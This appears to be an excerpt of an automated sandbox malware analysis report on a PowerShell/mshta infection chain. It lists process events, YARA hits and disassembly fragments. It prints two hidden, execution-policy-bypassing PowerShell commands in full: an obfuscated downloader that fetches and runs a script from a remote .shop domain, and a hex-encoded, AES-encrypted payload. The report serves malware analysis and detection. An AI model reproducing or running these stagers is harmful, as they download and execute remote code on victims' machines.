              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.AesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() Jump to behavior
              Source: Yara matchFile source: 4.2.powershell.exe.6e00000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2455403030.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_040A2CB5 push esp; iretd 2_2_040A2CD9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_008E385F push eax; retf 4_2_008E3860
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00AFA18D push esp; retf 4_2_00AFA321
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00AFA1CA push esp; retf 4_2_00AFA321
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00AF2D9D push eax; retf 4_2_00AF2E99
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00AFF4A5 push ebx; iretd 4_2_00AFF4BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00AFF4BB push ebx; iretd 4_2_00AFF4BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00AFF48D push ebx; iretd 4_2_00AFF4BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00AFF49D push ebx; iretd 4_2_00AFF4BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00AFDDBD push ebx; ret 4_2_00AFDDC2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BD868D push FFFFFF8Bh; iretd 4_2_06BD868F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BD863A push FFFFFF8Bh; ret 4_2_06BD863E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BDB652 push 8B008FBFh; iretd 4_2_06BDB657
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BD87B5 push FFFFFF8Bh; iretd 4_2_06BD87B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BEF6A6 push es; iretd 4_2_06BEF6AC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C031BF push es; iretd 4_2_06C031C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C17EE0 push ss; ret 4_2_06C17EE1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C1C672 push esp; ret 4_2_06C1C673
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C1C67F push esp; ret 4_2_06C1C680
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C1C61C push esp; ret 4_2_06C1C61D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C184C3 push ss; ret 4_2_06C184C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C194C3 push es; retf 4_2_06C194C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C1848E push ss; ret 4_2_06C1848F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C17C29 push ss; ret 4_2_06C17C2A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C1B58B pushfd ; ret 4_2_06C1B5A9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C17D01 push ss; ret 4_2_06C17D02
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C17A24 push ss; ret 4_2_06C17A25
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C143CB push es; iretd 4_2_06C143CC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C1834F push ss; ret 4_2_06C18350
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C14323 push es; iretd 4_2_06C14324
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C17B3A push ss; ret 4_2_06C17B3B
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
